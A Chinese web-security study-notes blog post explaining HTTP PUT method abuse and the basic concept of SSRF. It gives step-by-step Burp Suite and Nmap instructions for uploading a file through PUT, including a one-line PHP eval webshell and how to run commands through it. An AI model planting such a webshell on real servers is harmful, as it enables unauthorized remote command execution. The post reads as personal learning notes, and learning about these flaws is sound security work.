前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Web安全学习笔记(二):HTTP Put方法利用和SSRF基本概念

Web安全学习笔记(二):HTTP Put方法利用和SSRF基本概念

作者头像
Power7089
发布2019-07-25 09:48:37
7180
发布2019-07-25 09:48:37
举报

---------------开始---------------

0x01:前言

之前在挖公益SRC的时候,用Nmap扫描时候可以扫到http支持的方法,其中有几个可以利用PUT方法,作为标准的小菜鸟,听说过这个方法,但是具体利用可真不会呀,也在网上找了相关文章,但是都不详细。直到昨天看到一篇文章,今天上午拿来学习了一番,具体讲的是如何利用,这个确实不错,对于实战来说提升很大。回过头来去找那几个网站,可是PUT方法已经被禁用了,对于这个方法的实战,有缘见到一定好好鼓捣一番。

那篇文章有很多利用方法,基于我现在也只学了两招利用的方法,对于我来说够用了。

对于SSRF今天基本看了下概念,大致了解了理论的意思,但是具体实战今天确实没做,过两天找两个例子去实战一下,加深一下SSRF的理解。这个漏洞也一定要熟练掌握。

---------------正题(一)---------------

●HTTP Put方法利用:

PUT方法请求服务器去把请求里的实体存储在请求URI(Request-URI)标识下。

▶▶▶.BurpSuite利用Put方法:

①.设置相关代理 ---> 抓包拦截请求 ---> 右击发送到Repeater模块

②.将GET方法替换为PUT方法 ---> 上传一个test.php文件

③.在请求体中写上恶意利用代码(写个一句话木马就可以了)

♢穿插一个PHP一句话木马(<?php @eval($_GET["cmd"])?> )

④.如果响应头的状态码显示"201 Created",说明已被成功创建

⑤. 创建成功后一句话木马的利用,xxx.com/test.php?cmd="想要执行的命令"

▶▶▶.Nmap利用Put方法:

利用命令:

nmap -p 80 目标IP地址 -script http-put -script-args http-put.url="需上传目标网址的路径", http-put.file="你要上传文件的位置"

若显示:"http-put: /xxx/test.php was Successfully created" 说明上传成功了

注:其实整理这两个是为了留给自己看了,下面贴一下那篇文章的地方,对于Put方法的利用大概有个六七种,大家都可以学习一下~

通往知识的大门:http://www.4hou.com/technology/12885.html

---------------正题(二)---------------

●服务端请求伪造(Server-Side Request Forgery, SSRF)

▶定义:

由攻击者构造形成由服务端发起请求的一个安全漏洞,一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正因它是由服务端发起的,故它能够请求到与它相连而与外网隔离的内部系统。

▶形成原因:

服务端提供了从其他服务器应用获取数据的功能,但没有对目标地址过滤与限制。

今天对于SSRF仅是了解了个概念,然后就去找SRC实战挖洞了,今天毫无战果。对于SSRF的实战回来找个靶机来试试,到时在来这记录下。

--------今天就这么结束了,时间过得真快--------

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2018-08-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 小白帽学习之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档